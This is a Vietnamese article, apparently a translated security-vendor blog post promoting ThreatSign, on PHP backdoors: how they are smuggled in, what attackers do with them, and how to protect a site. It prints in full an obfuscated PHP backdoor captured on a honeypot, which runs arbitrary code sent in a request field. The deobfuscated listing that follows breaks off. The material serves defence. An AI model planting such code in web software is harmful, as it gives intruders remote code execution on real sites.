Cửa hậu PHP là gì?

Tất cả các trang web đều dễ bị tấn công. Được cấp quyền truy cập công khai và đủ thời gian, bất kỳ trang web nào chạy mã phía máy chủ đều có thể bị nhiễm. Ngôn ngữ phổ biến nhất để chạy mã trên máy chủ là PHP, với thị phần là 63. 5% của tất cả các trang web. Đó là cơ sở cho một số hệ thống quản lý nội dung được sử dụng rộng rãi nhất, bao gồm WordPress, Drupal và Joomla. Đó là một ngôn ngữ mạnh mẽ cung cấp cho các nhà phát triển sự lựa chọn về nền tảng. Thật không may, sức mạnh của nó nhường chỗ cho những khai thác khó phát hiện. Nếu bạn chạy một trang web PHP, điều cực kỳ quan trọng là phải có một bộ công cụ được cập nhật thường xuyên để phát hiện các nỗ lực lây nhiễm

Buôn lậu mã

Vì PHP chạy dưới dạng mã diễn giải nên kẻ xâm nhập có thể lấy mã độc để chạy trên một trang web bằng cách thay đổi tệp hiện có hoặc tải lên tệp có chứa mã PHP. Nó không nhất thiết phải có một. phần mở rộng php. Stack Overflow có một cuộc thảo luận về nhiều cách thực thi dữ liệu dưới dạng mã. Một số trong số chúng, chẳng hạn như bao gồm và yêu cầu, là cần thiết để ngôn ngữ hoạt động. Những người khác, như eval, dấn thân vào lĩnh vực nguy hiểm là tạo mã nhanh chóng

Những kẻ xâm nhập chỉ cần tiêm một lượng nhỏ mã để cài đặt một cửa hậu cho phép chúng chạy mã tùy ý trên máy chủ. Một backdoor đơn giản có thể chỉ là 18 ký tự mã. Đó là một bản hack ngây thơ sẽ cố chạy bất kỳ thứ gì mà bất kỳ ai gửi dưới dạng PHP. Một trang web có các biện pháp an ninh mạng tốt vừa phải có khả năng bắt được nó nhanh chóng. Nhưng các cửa hậu phức tạp hơn về cơ bản cũng làm điều tương tự. Họ chỉ thực hiện thêm các bước để ẩn mình. Họ làm xáo trộn mã và đảm bảo rằng chỉ những người giới thiệu cửa hậu mới có thể sử dụng nó

Một backdoor được ngụy trang tốt có thể tồn tại trên máy chủ trong một thời gian dài. Mục đích của nó thường không phải là để đánh sập trang web hoặc thay đổi nội dung của nó, mà là để phục vụ như một điểm khởi đầu để tấn công các trang web có giá trị cao. Những tên tội phạm đã giới thiệu nó có thể sử dụng nó cho nhiều mục đích khác nhau vì chúng có thể chạy bất kỳ loại mã PHP nào. Nếu họ không chơi quá tay, quản trị viên có thể không nhận thấy điều đó trong nhiều tuần hoặc nhiều tháng, nếu có. Chỉ khi trang web bị đưa vào danh sách đen, họ mới nhận thấy có điều gì đó không ổn

Một ví dụ gần đây

Chúng tôi thiết lập một trang web honeypot như một thử nghiệm. Chỉ mất 30 ngày để nó bị nhiễm bệnh. Chúng tôi đã tìm thấy một cửa hậu đã xuất hiện trong một số hoạt động dọn dẹp của chúng tôi. Nó bao gồm một đoạn ngắn PHP bị xáo trộn. Dọn dẹp để dễ đọc, nó trông như thế này

if (isset($_REQUEST[“d1”])) {
  echo base64_decode(“bGFkeWdhZ2F5”);
  $b= chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(10 1).chr(99).chr(111).chr(100).chr(101);
  $c = $_REQUEST[“d1”];
  $c1 = chr(102).chr(105).chr(108).chr(101).chr(95).chr(112).chr(117).chr(116).ch r(95).chr(99).chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(1 15);
  $d= chr(47).chr(116).chr(109).chr(112).chr(47).chr(102).chr(103).chr(100).chr (102).chr(103).chr(100).chr(102).chr(103);
  $d1 = chr(60).chr(63).chr(112).chr(104).chr(112).chr(32);
  $f = chr(117).chr(110).chr(108).chr(105).chr(110).chr(107); $c1($d, $d1.$b($c));
  include($d);
  $f($d);
}

Mã này tìm trường biểu mẫu có tên "d1. " Nếu có, nó sử dụng kết hợp giải mã cơ sở 64 và nối ký tự để xây dựng một hàm sẽ ghi nội dung của trường vào tệp, thực thi dưới dạng PHP và xóa tệp. Trừ đi sự che giấu, nó trông như thế này

1   if (isset($_REQUEST[“d1”])) {
2       echo base64_decode(“bGFkeWdhZ2F5”);
3       $b = “base64_decode”;
4       $c = $_REQUEST[“d1”];
5       $c1 = “file_put_contents”;
6       $d = “/tmp/fgdfgdfg”;
7       $d1 = “

Phiên bản đơn giản có thể được chèn trực tiếp, nhưng rõ ràng là nó tạo ra một tệp PHP có thể thực thi được một cách nhanh chóng. Hầu hết các công cụ bảo vệ sẽ treo rất nhiều cờ đỏ và vô hiệu hóa mã ngay lập tức. Phiên bản bị xáo trộn sẽ trốn tránh nhiều hình thức phát hiện. Người dùng có thể tự mình tìm kiếm các cửa hậu, và chắc chắn, điều đó tốt hơn là không có gì, nhưng các phương pháp che giấu ngày càng trở nên lén lút hơn

Cửa hậu đến từ đâu?

Trên một trang web hoàn toàn an toàn, cửa hậu sẽ không thành vấn đề vì không ai có thể đưa chúng vào máy chủ. Vấn đề là trang web hoàn toàn an toàn duy nhất là trang web không được kết nối với mạng. Có một số con đường mà mã trái phép có thể xâm nhập vào một trang web

• Lỗi trong mã máy chủ. Khiếm khuyết trong mã cho phép các thủ thuật như SQL injection, tràn bộ đệm và cross-site scripting vi phạm tính toàn vẹn của trang web và gửi mã độc hại. Mã cũ không được cập nhật đặc biệt dễ bị tổn thương vì nó có xu hướng có các lỗi được công khai
• Tải lên tệp. Trang web cho phép người dùng tải tệp lên dễ bị tấn công nếu không kiểm tra cẩn thận. Mã PHP có thể ẩn trong các tệp tự nhận là hình ảnh hoặc tệp lưu trữ Zip
• mã bổ sung. Một số người cung cấp mã bổ trợ cho một CMS tuyên bố sẽ làm được điều gì đó hữu ích nhưng lại chứa một cửa hậu. Một số trang web cung cấp các tiện ích bổ sung hợp pháp từ các nhà xuất bản nổi tiếng nhưng sửa đổi chúng để thêm mã thù địch. Ngay cả các nguồn hợp pháp đôi khi cũng bị lừa cung cấp phiên bản bị nhiễm
• Sử dụng thông tin đăng nhập tài khoản. Nếu kẻ gian có thể đoán hoặc đánh cắp mật khẩu quản trị viên, họ có thể đăng nhập vào trang web và làm bất cứ điều gì họ thích. Họ có thể cài đặt một cửa hậu thay vì sử dụng các phương tiện trực tiếp hơn, đơn giản vì nó có dấu vết nhỏ hơn và có thể không được chú ý. Thay đổi mật khẩu sẽ không giúp ích gì khi trang web bị xâm nhập

Một trang web có cửa hậu thường có nhiều hơn một. Tìm một và loại bỏ nó không phải là một sự đảm bảo để loại bỏ vấn đề

Họ có thể làm gì?

Một cuộc tấn công tiêm mã có thể khó phát hiện. Cảnh báo đầu tiên của bạn có thể là người dùng nhận được cảnh báo trình duyệt khi họ truy cập trang web của bạn. Có thể email bạn gửi đã bị đưa vào danh sách đen. Nó có thể là nội dung trên trang web của bạn không nên ở đó. Trang web của bạn có thể ngừng xuất hiện trong kết quả của công cụ tìm kiếm

• Gửi email spam từ trang web của bạn
• Sao chép phần mềm độc hại sang các trang web khác
• Tham gia vào một cuộc tấn công DDoS
• Chuyển tiếp tin nhắn để che giấu điểm gốc của chúng

Việc sử dụng liên tục của chúng có thể không gây hại trực tiếp, nhưng khi địa chỉ IP của một trang web thường xuyên là nguồn gốc của các hành động thù địch, nó sẽ bắt đầu xuất hiện trong danh sách đen. Các trình duyệt sẽ chặn trang web và email hợp pháp sẽ bị gắn cờ là thư rác. Những người cảnh giác trên Internet có thể cố gắng tấn công trang web và gỡ nó xuống

Cách bảo mật trang web của tôi

Mặc dù không có gì đảm bảo an toàn tuyệt đối, nhưng bạn có thể thực hiện một số điều để làm cho trang web của mình ít bị tấn công hơn và phát hiện xâm nhập nhanh hơn

Luôn cập nhật phần mềm là rất quan trọng. Phiên bản mới nhất của CMS có các bản vá cho tất cả các lỗ hổng đã biết. Bạn cũng nên cập nhật phiên bản PHP của mình lên phiên bản mới nhất mà mã của bạn cho phép

Bạn nên khóa trang web càng chặt càng tốt. Đảm bảo rằng tất cả các tài khoản đều được bảo mật tốt và không cấp đặc quyền quá tùy tiện. Hãy cẩn thận về nơi bạn nhận được mã bổ trợ của mình. Không cho phép người lạ tải tệp lên hoặc ít nhất đảm bảo rằng họ không truy cập thư mục có thể truy cập Web

Cuối cùng, bạn cần các công cụ mạnh mẽ, cập nhật để loại bỏ và phát hiện phần mềm độc hại. Phần mềm độc hại liên tục phát triển và các công cụ để phát hiện phần mềm độc hại cần phải cập nhật các thủ thuật mới nhất. Khi đăng ký ThreatSign, bạn sẽ nhận được cảnh báo về phần mềm độc hại và theo dõi bảo mật mà không cần phải cài đặt các bản cập nhật liên tục trên máy của chính mình. Nó quét tất cả các tệp trên trang web của bạn và báo cáo mọi phần mềm độc hại mà nó tìm thấy. Nó cũng báo cáo nếu trang web của bạn đã được đưa vào danh sách đen và cho phép xóa bằng một cú nhấp chuột sau khi sự cố được khắc phục. Với ThreatSign, bạn có thể yên tâm rằng mọi hành vi xâm nhập vào trang web của bạn sẽ bị bắt quả tang

Mã PHP cửa hậu là gì?

Shell backdoor là gì?

Vỏ PHP là gì?

Phát hiện tệp PHP WebShell chung chung là gì?